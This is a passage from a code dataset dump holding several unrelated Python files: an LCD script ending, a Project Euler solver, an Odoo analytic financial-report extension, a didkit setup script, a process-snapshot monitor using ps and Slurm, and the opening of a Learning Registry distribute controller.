__name__ == '__main__':\n\n try:\n main()\n except KeyboardInterrupt:\n pass\n finally:\n lcd_byte(0x01, LCD_CMD)\n lcd_string(\"Goodbye!\",LCD_LINE_1)\n# GPIO_cleanup()\n","sub_path":"lcd.py","file_name":"lcd.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99113196","text":"### https://www.projecteuler.net/problem=58\n\nimport 
sys\nsys.path.append(r'..\\euler')\nimport common as euler\nimport time\n\ndef Problem58(n: float):\n ''' For a number 0 < n < 1, returns the side length\n of the square for which the proportion of primes\n along the diagonals is less than n'''\n\n # Initialise the spiral with side length 3\n start_time = time.time()\n diagonal = [1, 3, 5, 7, 9]\n side_length = 3\n prime_count = 3\n \n # Note that the ratio is not monotonically decreasing\n # However since the question asks for the first time it drops below n, this will do\n while (prime_count / len(diagonal) >= n):\n # Update the side length and step between each new number\n side_length += 2\n step = side_length - 1\n\n # At each new layer, we need to generate 4 new numbers\n # Add them to the diagonal, and to the prime counter if necessary\n for i in range(4):\n new_number = diagonal[-1] + step\n if (euler.is_prime(new_number)):\n prime_count += 1\n diagonal.append(new_number)\n \n return side_length, '%.3f s' % (time.time() - start_time)","sub_path":"Page2/Problem58.py","file_name":"Problem58.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58732284","text":"# -*- coding: utf-8 -*-\r\nimport ast\r\nfrom odoo import models, fields, api, _\r\nfrom odoo.tools.safe_eval import safe_eval\r\nfrom datetime import datetime\r\nfrom odoo.tools import float_is_zero\r\nfrom dateutil.relativedelta import relativedelta\r\n\r\nclass AccountFinancialReportContext(models.TransientModel):\r\n _inherit = 'account.financial.html.report.context'\r\n\r\n analytic_level_id = fields.Many2one('account.analytic.level', string='Analytic Levels')\r\n\r\n @api.multi\r\n def get_columns_names(self):\r\n columns = super(AccountFinancialReportContext, self).get_columns_names()\r\n # analytic_level_id = self.env.context.get('analytic_level_id')\r\n if self.analytic_level_id:\r\n analytic_account_ids = 
self.env['account.analytic.account'].search([('level_id','=',self.analytic_level_id.id)])\r\n if analytic_account_ids:\r\n columns = []\r\n for analytic in analytic_account_ids:\r\n columns.append(analytic.name)\r\n return columns\r\n\r\n @api.multi\r\n def get_columns_types(self):\r\n result = super(AccountFinancialReportContext, self).get_columns_types()\r\n # analytic_level_id = self.env.context.get('analytic_level_id')\r\n if self.analytic_level_id:\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id', '=', self.analytic_level_id.id)])\r\n if analytic_account_ids:\r\n result = ['number' for i in analytic_account_ids]\r\n return result\r\n\r\nAccountFinancialReportContext()\r\n\r\nclass AccountFinancialReportLine(models.Model):\r\n _inherit = 'account.financial.html.report.line'\r\n\r\n def _process_formulas(self):\r\n result = self._split_formulas()\r\n if result:\r\n result = result.values()[0].split(' ')\r\n else:\r\n result = []\r\n result = filter(None, result)\r\n # checking -ve values\r\n final_result = []\r\n for item in result:\r\n if len(item) > 1 and '-' in item:\r\n final_result.append('-')\r\n final_result.append(item[1:])\r\n else:\r\n final_result.append(item)\r\n return final_result\r\n\r\n def _expand_formulas(self, formulas):\r\n result = self._process_formulas()\r\n while (1):\r\n verify_list = []\r\n new_result = []\r\n for item in result:\r\n if len(item) > 1 and '.' 
in item:\r\n data = item.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n if not report_line_id.domain:\r\n data = report_line_id._process_formulas()\r\n if any(operator in result for operator in ['+','-','*','/']) and any(operator in data for operator in ['+','-','*','/']):\r\n new_data_list = ['(']\r\n for item2 in data:\r\n new_data_list.append(item2)\r\n new_data_list.append(')')\r\n new_result.extend(new_data_list)\r\n else:\r\n new_result.extend(data)\r\n verify_list.append(False)\r\n else:\r\n new_result.append(item)\r\n verify_list.append(True)\r\n else:\r\n new_result.append(item)\r\n verify_list.append(True)\r\n operator = item\r\n result = new_result\r\n if all(verify_list):\r\n break\r\n return result\r\n\r\n def _eval_formula(self, financial_report, debit_credit, context, currency_table, linesDict):\r\n if context.analytic_level_id:\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id','=',context.analytic_level_id.id)]).ids\r\n analytic_amount_dict = dict([(id, 0.00) for id in analytic_account_ids])\r\n analytic_final_dict = dict([(id, '') for id in analytic_account_ids])\r\n if self.domain:\r\n field_data = self.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(self.domain)\r\n domain.extend([('date','>=',self.env.context.get('date_from')),('date','<=',self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict:\r\n analytic_amount_dict.update({line.analytic_account_id.id: analytic_amount_dict.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n # Updating main dict\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: field_data_sign + 
str(analytic_amount_dict.get(id))})\r\n elif self.formulas:\r\n result = self._expand_formulas(self.formulas)\r\n for item in result:\r\n if len(item) > 1:\r\n if type(item) == tuple:\r\n analytic_amount_dict2 = dict([(id, 0.00) for id in analytic_account_ids])\r\n analytic_final_dict2 = dict([(id, '') for id in analytic_account_ids])\r\n for item2 in item:\r\n if len(item2) > 1 and '.' in item2:\r\n data = item2.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n field_data = report_line_id.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(report_line_id.domain)\r\n domain.extend([('date', '>=', self.env.context.get('date_from')),('date', '<=', self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict2:\r\n analytic_amount_dict2.update({line.analytic_account_id.id: analytic_amount_dict2.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n for id in analytic_amount_dict2:\r\n analytic_final_dict2.update({id: analytic_final_dict2.get(id) + field_data_sign + str(analytic_amount_dict2.get(id))})\r\n elif len(item2) > 1 and item2 == 'NDays':\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict2:\r\n analytic_final_dict2.update({id: str(analytic_final_dict2.get(id)) + str(days)})\r\n else:\r\n for id in analytic_final_dict2:\r\n analytic_final_dict2.update({id: str(analytic_final_dict2.get(id)) + item2})\r\n # Updating main dict\r\n for id in analytic_final_dict2:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + '(' + analytic_final_dict2.get(id) + 
')'})\r\n elif len(item) > 1 and item == 'NDays':\r\n # Updating main dict\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + str(days)})\r\n else:\r\n data = item.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n field_data = report_line_id.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(report_line_id.domain)\r\n domain.extend([('date', '>=', self.env.context.get('date_from')), ('date', '<=', self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict:\r\n analytic_amount_dict.update({line.analytic_account_id.id: analytic_amount_dict.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n # Updating main dict\r\n for id in analytic_amount_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + field_data_sign + str(analytic_amount_dict.get(id))})\r\n\r\n elif len(item) > 1 and item == 'NDays':\r\n # Updating main dict\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + str(days)})\r\n else:\r\n # Updating main dict\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + item})\r\n\r\n debit_credit = debit_credit and financial_report.debit_credit\r\n formulas = self._split_formulas()\r\n if self.code and self.code in 
linesDict:\r\n res = linesDict[self.code]\r\n else:\r\n res = FormulaLine(self, currency_table, financial_report, linesDict=linesDict)\r\n vals = {}\r\n vals['balance'] = res.balance\r\n if context.analytic_level_id:\r\n vals['analytic_final_dict'] = analytic_final_dict\r\n if debit_credit:\r\n vals['credit'] = res.credit\r\n vals['debit'] = res.debit\r\n\r\n results = {}\r\n if self.domain and self.groupby and self.show_domain != 'never':\r\n aml_obj = self.env['account.move.line']\r\n tables, where_clause, where_params = aml_obj._query_get(domain=self.domain)\r\n sql, params = self._get_with_statement(financial_report)\r\n if financial_report.tax_report:\r\n where_clause += ''' AND \"account_move_line\".tax_exigible = 't' '''\r\n\r\n groupby = self.groupby or 'id'\r\n if groupby not in self.env['account.move.line']:\r\n raise ValueError('Groupby should be a field from account.move.line')\r\n select, select_params = self._query_get_select_sum(currency_table)\r\n params += select_params\r\n sql = sql + \"SELECT \\\"account_move_line\\\".\" + groupby + \", \" + select + \" FROM \" + tables + \" WHERE \" + where_clause + \" GROUP BY \\\"account_move_line\\\".\" + groupby\r\n\r\n params += where_params\r\n self.env.cr.execute(sql, params)\r\n results = self.env.cr.fetchall()\r\n results = dict([(k[0], {'balance': k[1], 'amount_residual': k[2], 'debit': k[3], 'credit': k[4]}) for k in results])\r\n c = FormulaContext(self.env['account.financial.html.report.line'], linesDict, currency_table, financial_report, only_sum=True)\r\n if formulas:\r\n for key in results:\r\n c['sum'] = FormulaLine(results[key], currency_table, financial_report, type='not_computed')\r\n c['sum_if_pos'] = FormulaLine(results[key]['balance'] >= 0.0 and results[key] or {'balance': 0.0}, currency_table, financial_report, type='not_computed')\r\n c['sum_if_neg'] = FormulaLine(results[key]['balance'] <= 0.0 and results[key] or {'balance': 0.0}, currency_table, financial_report, 
type='not_computed')\r\n for col, formula in formulas.items():\r\n if col in results[key]:\r\n results[key][col] = safe_eval(formula, c, nocopy=True)\r\n to_del = []\r\n for key in results:\r\n if self.env.user.company_id.currency_id.is_zero(results[key]['balance']):\r\n to_del.append(key)\r\n for key in to_del:\r\n del results[key]\r\n\r\n results.update({'line': vals})\r\n return results\r\n\r\n @api.multi\r\n def get_lines(self, financial_report, context, currency_table, linesDicts):\r\n final_result_table = []\r\n comparison_table = context.get_periods()\r\n currency_precision = self.env.user.company_id.currency_id.rounding\r\n # build comparison table\r\n\r\n for line in self:\r\n res = []\r\n debit_credit = len(comparison_table) == 1\r\n domain_ids = {'line'}\r\n k = 0\r\n for period in comparison_table:\r\n period_from = period[0]\r\n period_to = period[1]\r\n strict_range = False\r\n if line.special_date_changer == 'from_beginning':\r\n period_from = False\r\n if line.special_date_changer == 'to_beginning_of_period':\r\n date_tmp = datetime.strptime(period[0], \"%Y-%m-%d\") - relativedelta(days=1)\r\n period_to = date_tmp.strftime('%Y-%m-%d')\r\n period_from = False\r\n if line.special_date_changer == 'strict_range':\r\n strict_range = True\r\n r = line.with_context(date_from=period_from, date_to=period_to, strict_range=strict_range)._eval_formula(financial_report, debit_credit, context, currency_table, linesDicts[k])\r\n debit_credit = False\r\n res.append(r)\r\n domain_ids.update(set(r.keys()))\r\n k += 1\r\n res = self._put_columns_together(res, domain_ids)\r\n if r['line'].get('analytic_final_dict'):\r\n res.update({'analytic_final_dict': r['line'].get('analytic_final_dict')})\r\n\r\n if line.hide_if_zero and all([float_is_zero(k, precision_rounding=currency_precision) for k in res['line']]):\r\n continue\r\n\r\n # Analytic level based amount\r\n columns = []\r\n if context.analytic_level_id and res.get('analytic_final_dict'):\r\n analytic_account_ids = 
self.env['account.analytic.account'].search([('level_id', '=', context.analytic_level_id.id)]).ids\r\n for aa_id in analytic_account_ids:\r\n amount_string = res.get('analytic_final_dict').get(aa_id)\r\n try:\r\n amount = amount_string and eval(amount_string) or 0.0\r\n except:\r\n amount = 0.0\r\n columns.append(amount)\r\n if not columns:\r\n columns = res['line']\r\n\r\n # Post-processing ; creating line dictionnary, building comparison, computing total for extended, formatting\r\n vals = {\r\n 'id': line.id,\r\n 'name': line.name,\r\n 'type': 'line',\r\n 'level': line.level,\r\n 'footnotes': context._get_footnotes('line', line.id),\r\n 'columns': columns,\r\n 'unfoldable': len(domain_ids) > 1 and line.show_domain != 'always',\r\n 'unfolded': line in context.unfolded_lines or line.show_domain == 'always',\r\n }\r\n if line.action_id:\r\n vals['action_id'] = line.action_id.id\r\n domain_ids.remove('line')\r\n lines = [vals]\r\n groupby = line.groupby or 'aml'\r\n if line in context.unfolded_lines or line.show_domain == 'always':\r\n if line.groupby:\r\n domain_ids = sorted(list(domain_ids), key=lambda k: line._get_gb_name(k))\r\n for domain_id in domain_ids:\r\n name = line._get_gb_name(domain_id)\r\n vals = {\r\n 'id': domain_id,\r\n 'name': name and len(name) >= 45 and name[0:40] + '...' 
or name,\r\n 'level': 1,\r\n 'type': groupby,\r\n 'footnotes': context._get_footnotes(groupby, domain_id),\r\n 'columns': res[domain_id],\r\n }\r\n if line.financial_report_id.name == 'Aged Receivable':\r\n vals['trust'] = self.env['res.partner'].browse([domain_id]).trust\r\n lines.append(vals)\r\n if domain_ids:\r\n lines.append({\r\n 'id': line.id,\r\n 'name': _('Total') + ' ' + line.name,\r\n 'type': 'o_account_reports_domain_total',\r\n 'level': 1,\r\n 'footnotes': context._get_footnotes('o_account_reports_domain_total', line.id),\r\n 'columns': list(lines[0]['columns']),\r\n })\r\n\r\n # Analytic level based amount\r\n # columns = []\r\n # if context.analytic_level_id:\r\n # analytic_account_ids = self.env['account.analytic.account'].search([('level_id','=',context.analytic_level_id.id)])\r\n # for record in analytic_account_ids:\r\n # amount = ( record.ratio / 100.00) * float(lines[0].get('columns')[0])\r\n # columns.append(line._format(amount))\r\n\r\n for vals in lines:\r\n if len(comparison_table) == 2:\r\n vals['columns'].append(line._build_cmp(vals['columns'][0], vals['columns'][1]))\r\n for i in [0, 1]:\r\n vals['columns'][i] = line._format(vals['columns'][i])\r\n else:\r\n vals['columns'] = map(line._format, vals['columns'])\r\n if columns:\r\n vals['columns'] = map(line._format, columns)\r\n if not line.formulas:\r\n vals['columns'] = ['' for k in vals['columns']]\r\n\r\n if len(lines) == 1:\r\n new_lines = line.children_ids.get_lines(financial_report, context, currency_table, linesDicts)\r\n if new_lines and line.level > 0 and line.formulas:\r\n divided_lines = self._divide_line(lines[0])\r\n result = [divided_lines[0]] + new_lines + [divided_lines[1]]\r\n else:\r\n result = []\r\n if line.level > 0:\r\n result += lines\r\n result += new_lines\r\n if line.level <= 0:\r\n result += lines\r\n else:\r\n result = lines\r\n final_result_table += result\r\n\r\n return final_result_table\r\n\r\nAccountFinancialReportLine()\r\n\r\nclass 
FormulaLine(object):\r\n def __init__(self, obj, currency_table, financial_report, type='balance', linesDict=None):\r\n if linesDict is None:\r\n linesDict = {}\r\n fields = dict((fn, 0.0) for fn in ['debit', 'credit', 'balance'])\r\n if type == 'balance':\r\n fields = obj.get_balance(linesDict, currency_table, financial_report)[0]\r\n linesDict[obj.code] = self\r\n elif type in ['sum', 'sum_if_pos', 'sum_if_neg']:\r\n if type == 'sum_if_neg':\r\n obj = obj.with_context(sum_if_neg=True)\r\n if type == 'sum_if_pos':\r\n obj = obj.with_context(sum_if_pos=True)\r\n if obj._name == 'account.financial.html.report.line':\r\n fields = obj._get_sum(currency_table, financial_report)\r\n self.amount_residual = fields['amount_residual']\r\n elif obj._name == 'account.move.line':\r\n self.amount_residual = 0.0\r\n field_names = ['debit', 'credit', 'balance', 'amount_residual']\r\n res = obj.env['account.financial.html.report.line']._compute_line(currency_table, financial_report)\r\n for field in field_names:\r\n fields[field] = res[field]\r\n self.amount_residual = fields['amount_residual']\r\n elif type == 'not_computed':\r\n for field in fields:\r\n fields[field] = obj.get(field, 0)\r\n self.amount_residual = obj.get('amount_residual', 0)\r\n elif type == 'null':\r\n self.amount_residual = 0.0\r\n self.balance = fields['balance']\r\n self.credit = fields['credit']\r\n self.debit = fields['debit']\r\n\r\nclass FormulaContext(dict):\r\n def __init__(self, reportLineObj, linesDict, currency_table, financial_report, curObj=None, only_sum=False, *data):\r\n self.reportLineObj = reportLineObj\r\n self.curObj = curObj\r\n self.linesDict = linesDict\r\n self.currency_table = currency_table\r\n self.only_sum = only_sum\r\n self.financial_report = financial_report\r\n return super(FormulaContext, self).__init__(data)\r\n\r\n def __getitem__(self, item):\r\n formula_items = ['sum', 'sum_if_pos', 'sum_if_neg']\r\n if item in set(__builtins__.keys()) - set(formula_items):\r\n return 
super(FormulaContext, self).__getitem__(item)\r\n\r\n if self.only_sum and item not in formula_items:\r\n return FormulaLine(self.curObj, self.currency_table, self.financial_report, type='null')\r\n if self.get(item):\r\n return super(FormulaContext, self).__getitem__(item)\r\n if self.linesDict.get(item):\r\n return self.linesDict[item]\r\n if item == 'sum':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum')\r\n self['sum'] = res\r\n return res\r\n if item == 'sum_if_pos':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum_if_pos')\r\n self['sum_if_pos'] = res\r\n return res\r\n if item == 'sum_if_neg':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum_if_neg')\r\n self['sum_if_neg'] = res\r\n return res\r\n if item == 'NDays':\r\n d1 = datetime.strptime(self.curObj.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.curObj.env.context['date_to'], \"%Y-%m-%d\")\r\n res = (d2 - d1).days\r\n self['NDays'] = res\r\n return res\r\n line_id = self.reportLineObj.search([('code', '=', item)], limit=1)\r\n if line_id:\r\n strict_range = line_id.special_date_changer == 'strict_range'\r\n period_from = line_id._context['date_from']\r\n period_to = line_id._context['date_to']\r\n if line_id.special_date_changer == 'from_beginning':\r\n period_from = False\r\n if line_id.special_date_changer == 'to_beginning_of_period' and line_id._context.get('date_from'):\r\n date_tmp = datetime.strptime(line_id._context['date_from'], \"%Y-%m-%d\") - relativedelta(days=1)\r\n period_to = date_tmp.strftime('%Y-%m-%d')\r\n period_from = False\r\n res = FormulaLine(line_id.with_context(strict_range=strict_range, date_from=period_from, date_to=period_to), self.currency_table, self.financial_report, linesDict=self.linesDict)\r\n self.linesDict[item] = res\r\n return res\r\n return super(FormulaContext, 
self).__getitem__(item)\r\n","sub_path":"beta-dev1/opt/odoo/odoo/addons/core/multi_level_analytical/models/account_financial_report.py","file_name":"account_financial_report.py","file_ext":"py","file_size_in_byte":24936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621672920","text":"#! /usr/bin/env python3\nimport os\nimport platform\nfrom setuptools import setup, Extension\n\n##Determine what system we are building on to determine what type of shared object has been built and needs copyingthis differs between OS's (e.g. libdidkit.so vs libdidkit.dylib vs libdidkit.dll)\ndidpath = \"didkit\"\nhost_os = platform.system()\n\nif host_os == \"Linux\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'libdidkit.so')\nelif host_os == \"Darwin\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'libdidkit.dylib')\nelif host_os == \"Windows\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'didkit.dll')\nelse:\n raise RuntimeError(\"System type %s unsupported. 
Exiting setup.\"%(host_os))\n\n## All other static build variables comes from setup.cfg\nsetup_args = dict(\n data_files = [ (\"\" , [LIBDIDKIT_SHARE_OBJ] ) ]\n)\n\nsetup(**setup_args)","sub_path":"lib/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15878621","text":"import sys\nimport os\nimport datetime\nimport time\nimport csv\nimport socket\nimport multiprocessing\n\nfrom contextlib import contextmanager\nfrom subprocess import check_output, SubprocessError, TimeoutExpired, DEVNULL\nfrom collections import defaultdict, namedtuple\nfrom configparser import ConfigParser\n\n\ndef get_timestamp():\n \"\"\"\n Returns time stamp as string in ISO 8601 with time zone information.\n \"\"\"\n\n # https://stackoverflow.com/a/28147286\n utc_offset_sec = time.altzone if time.localtime().tm_isdst else time.timezone\n utc_offset = datetime.timedelta(seconds=-utc_offset_sec)\n\n return (\n datetime.datetime.now()\n .replace(tzinfo=datetime.timezone(offset=utc_offset))\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f%z\")\n )\n\n\ndef get_slurm_info(hostname):\n \"\"\"\n Try to get the users, jobids, and projects from the current `hostname`.\n If a user should run two jobs with two different projects or jobids, only the last discovered values will be assumed for the user.\n\n :returns: A defaultdict with the mapping from user to project. 
Project is '-' if the user is not found or slurm is not available.\n \"\"\"\n\n user_to_slurminfo = defaultdict(\n lambda: {\"jobid\": \"-\", \"project\": \"-\", \"num_cores\": \"-\", \"min_mem\": \"-\"}\n )\n\n # %i Job ID (or _ for job arrays)\n # %a Account (project)\n # %u User\n try:\n command = f\"squeue --noheader --nodelist={hostname} --format=%i,%a,%u,%m,%C\"\n output = check_output(command, shell=True, stderr=DEVNULL, timeout=3).decode(\n \"utf8\"\n )\n except TimeoutExpired:\n # Slurm took too more than 3 seconds to respond, perhaps the node is ill\n # we had a case where this lead to Sonar jobs piling up since they were waiting for\n # a stuck Slurm\n return user_to_slurminfo\n except SubprocessError:\n # if Slurm is not available, return the empty defaultdict that will return '-' for any key call.\n return user_to_slurminfo\n\n for line in output.split(\"\\n\"):\n line = line.strip()\n if not line:\n continue\n jobid, project, user, min_mem, num_cores = line.split(\",\")\n user_to_slurminfo[user] = {\n \"jobid\": jobid,\n \"project\": project,\n \"num_cores\": num_cores,\n \"min_mem\": min_mem,\n }\n\n return user_to_slurminfo\n\n\ndef get_available_memory():\n \"\"\"\n Tries to return the memory available on the current node in bytes. Returns a negative number if the value cannot be determined.\n This is Unix-specific.\n \"\"\"\n\n # Another possibility would be to read /proc/meminfo\n return os.sysconf(\"SC_PAGE_SIZE\") * os.sysconf(\"SC_PHYS_PAGES\")\n\n\ndef extract_processes(raw_text, ignored_users):\n \"\"\"\n Extract user, cpu, memory, and command from `raw_text` that should be the (special) output of a `ps` command.\n `ignored_users` should be a list with users that shall be ignored.\n \"\"\"\n\n cpu_percentages = defaultdict(float)\n mem_percentages = defaultdict(float)\n for line in raw_text.split(\"\\n\"):\n # Using maxsplit to prevent commands to be split. 
This is unstable if the `ps` call is altered!\n words = line.split(maxsplit=4)\n if len(words) == 5:\n pid, user, cpu_percentage, mem_percentage, command = words\n if user not in ignored_users:\n cpu_percentages[(user, command)] += float(cpu_percentage)\n mem_percentages[(user, command)] += float(mem_percentage)\n\n return cpu_percentages, mem_percentages\n\n\ndef test_extract_processes():\n text = \"\"\"\n 2011 bob 10.0 20.0 slack\n 2022 bob 10.0 15.0 chromium\n 12057 bob 10.0 15.0 chromium\n 2084 alice 10.0 5.0 slack\n 2087 bob 10.0 5.0 someapp\n 2090 alice 10.0 5.0 someapp\n 2093 alice 10.0 5.0 someapp\n \"\"\"\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=text, ignored_users=[]\n )\n\n assert cpu_percentages == {\n (\"bob\", \"slack\"): 10.0,\n (\"bob\", \"chromium\"): 20.0,\n (\"alice\", \"slack\"): 10.0,\n (\"bob\", \"someapp\"): 10.0,\n (\"alice\", \"someapp\"): 20.0,\n }\n assert mem_percentages == {\n (\"bob\", \"slack\"): 20.0,\n (\"bob\", \"chromium\"): 30.0,\n (\"alice\", \"slack\"): 5.0,\n (\"bob\", \"someapp\"): 5.0,\n (\"alice\", \"someapp\"): 10.0,\n }\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=text, ignored_users=[\"bob\"]\n )\n\n assert cpu_percentages == {(\"alice\", \"slack\"): 10.0, (\"alice\", \"someapp\"): 20.0}\n assert mem_percentages == {(\"alice\", \"slack\"): 5.0, (\"alice\", \"someapp\"): 10.0}\n\n\ndef get_hostname():\n # we first try to get the hostname alias\n # we do this because at least on our cluster slurm uses\n # the alias (\"c61-8\") instead of the full hostname (e.g. \"c61-8.local\")\n hostname = check_output([\"hostname\", \"-a\"]).rstrip().decode(\"utf-8\")\n if hostname == \"\":\n # if alias is empty, we try hostname\n hostname = socket.gethostname()\n # workaround: on one machine hostname -a yields a long (full?) 
hostname which\n # confused Slurm\n # here we assume that Slurm hosts never contain \".\"\n # and cut away the part after the dot\n # this might be wrong\n return hostname.split(\".\")[0]\n\n\ndef create_snapshot(cpu_cutoff, mem_cutoff, ignored_users):\n \"\"\"\n Take a snapshot of the currently running processes that use more than `cpu_cutoff` cpu and `mem_cutoff` memory, ignoring the set or list `ignored_users`. Return a list of lists being lines of columns.\n \"\"\"\n\n # -e show all processes\n # -o output formatting. user:30 is a hack to prevent cut-off user names\n output = check_output(\n \"ps -e --no-header -o pid,user:30,pcpu,pmem,comm\", shell=True\n ).decode(\"utf-8\")\n timestamp = get_timestamp()\n hostname = get_hostname()\n num_cores = multiprocessing.cpu_count()\n slurm_info = get_slurm_info(hostname)\n total_memory = get_available_memory()\n if total_memory < 0:\n total_memory = 1\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=output, ignored_users=ignored_users\n )\n\n snapshot = []\n\n for user, command in cpu_percentages:\n cpu_percentage = cpu_percentages[(user, command)]\n if cpu_percentage >= cpu_cutoff:\n mem_percentage = mem_percentages[(user, command)]\n if mem_percentage >= mem_cutoff:\n # Weird number is 1024*1024*100 to get MiB and %\n mem_absolute = int(total_memory * mem_percentage / 104857600)\n snapshot.append(\n [\n timestamp,\n hostname,\n num_cores,\n user,\n command,\n \"{:.1f}\".format(cpu_percentage),\n mem_absolute,\n slurm_info[user][\"project\"],\n slurm_info[user][\"jobid\"],\n slurm_info[user][\"num_cores\"],\n slurm_info[user][\"min_mem\"],\n ]\n )\n\n return snapshot\n\n\ndef main(config):\n \"\"\"\n Take a snapshot of the currently running processes that use more than `cpu_cutoff` cpu and `mem_cutoff` memory and print it to stdout.\n \"\"\"\n\n snapshot = create_snapshot(\n config[\"cpu_cutoff\"], config[\"mem_cutoff\"], config[\"ignored_users\"]\n )\n\n f_writer = csv.writer(\n sys.stdout,\n 
delimiter=config[\"output_delimiter\"],\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL,\n )\n f_writer.writerows(snapshot)\n","sub_path":"venv/Lib/site-packages/sonar/snap.py","file_name":"snap.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17539188","text":"# Copyright 2011 Department of Defence\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport couchdb\nimport urlparse\nimport json\nimport urllib2\nimport threading\nimport re\nfrom pylons import request, response, session, tmpl_context as c, url\nfrom pylons.controllers.util import abort, redirect\nfrom lr.model import LRNode as sourceLRNode, \\\n NodeServiceModel, ResourceDataModel, LRNodeModel, defaultCouchServer, appConfig\nfrom lr.lib.base import BaseController, render\nfrom lr.lib import helpers as h\nimport base64\nimport pprint\n\nlog = logging.getLogger(__name__)\n\nclass DistributeController(BaseController):\n def __before__(self):\n self.resource_data = appConfig['couchdb.db.resourcedata']\n \"\"\"REST Controller styled on the Atom Publishing Protocol\"\"\"\n # To properly map this controller, ensure your config/routing.py\n # file has a resource setup:\n # map.resource('distribute', 'distribute')\n def index(self, format='html'):\n \"\"\"GET /distribute: All items in the collection\"\"\"\n # url('distribute')\n distributeInfo = {'OK': True}\n \n #if 
sourceLRNode.isServiceAvailable(NodeServiceModel.DISTRIBUTE) == False:\n #distributeInfo['OK'] = False\n #else:\n distributeInfo['node_config'] = sourceLRNode.config\n distributeInfo['distribute_sink_url'] = urlparse.urljoin(request.url,self.resource_data)\n # Check to see if the couch resource_data is defined in the config if so use it.\n if appConfig.has_key(\"distribute_sink_url\"):\n distributeInfo['distribute_sink_url'] = appConfig[\"distribute_sink_url\"]\n\n log.info(\"received distribute request...returning: \\n\"+json.dumps(distributeInfo))\n return json.dumps(distributeInfo)\n \n def _getDistributeDestinations(self):\n \"\"\"\"Method to test the connections and returns a list of destionation node\n if the connections are valid\"\"\"\n nodeDestinationList =[]\n gatewayConnectionList = []\n for connection in sourceLRNode.connections:\n # Make sure that the connection is active \n if connection.active == False:\n continue\n destinationLRNode = None\n \n if connection.gateway_connection == True:\n gatewayConnectionList.append(connection)\n try:\n # Make sure we only have one slash in the url path. More than one \n #confuses pylons routing libary.\n destinationURL = urlparse.urljoin(connection.destination_node_url.strip(),\n \"distribute\")\n \n request = urllib2.Request(destinationURL)\n credential = 